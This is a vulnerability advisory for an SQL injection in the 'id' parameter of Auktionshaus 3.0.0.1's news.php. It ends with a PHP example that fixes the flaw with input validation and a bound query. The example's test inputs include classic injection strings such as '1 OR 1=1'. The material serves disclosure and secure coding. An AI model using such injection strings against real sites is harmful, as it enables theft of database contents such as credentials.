Vendor: Auktionshaus
By: Easy Laster
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Auktionshaus
Affected Version From: 3.0.0.1
Affected Version To: 3.0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
Auktionshaus 3.0.0.1 news.php (id) SQL Injection
A vulnerability in the Auktionshaus 3.0.0.1 news.php script can be exploited to perform an SQL injection attack. The vulnerability is caused by the 'id' parameter not being properly sanitized before it is used in an SQL query. This can be exploited to inject or manipulate SQL queries in the backend database. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords.
Mitigation:
Input validation should be used to ensure that untrusted data is not used to construct SQL queries that are executed on the backend database.
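The mitigation above, sketched for a numeric 'id' parameter like the one news.php takes. This is an added example, not code from Auktionshaus or from the advisory: the `news` table, its columns, and the function names are assumptions, and an in-memory SQLite database accessed through PDO stands in for the real backend (PHP 8.0 or later). It pairs strict integer validation with a bound parameter, so the value is never concatenated into the SQL text.

```php
<?php
declare(strict_types=1);

// Constructed schema and data; the real Auktionshaus tables are not shown in the advisory.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
    $pdo->exec("INSERT INTO news (id, title, body) VALUES (1, 'Welcome', 'First post')");
    return $pdo;
}

/**
 * Hypothetical hardened lookup for a news.php-style 'id' parameter.
 * Returns the matching row, or null when the id is invalid or unknown.
 */
function fetch_news(PDO $pdo, mixed $rawId): ?array
{
    // Step 1: allow-list validation. Only a positive integer passes;
    // strings with trailing SQL, quotes, or array-valued parameters are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Step 2: bound parameter. The query text is fixed; the id travels as data.
    $stmt = $pdo->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, an unknown id, two malformed strings,
// and an array such as PHP builds from a request like ?id[]=1.
$pdo = demo_db();
foreach (['1', '2', '1 OR 1=1', "1'", ['1']] as $input) {
    $row = fetch_news($pdo, $input);
    printf(
        "%-12s => %s\n",
        json_encode($input),
        $row === null ? 'rejected or not found' : $row['title']
    );
}
```

Validation alone is the weaker of the two controls; the bound parameter is what keeps the query structure fixed even if a validation rule is later loosened.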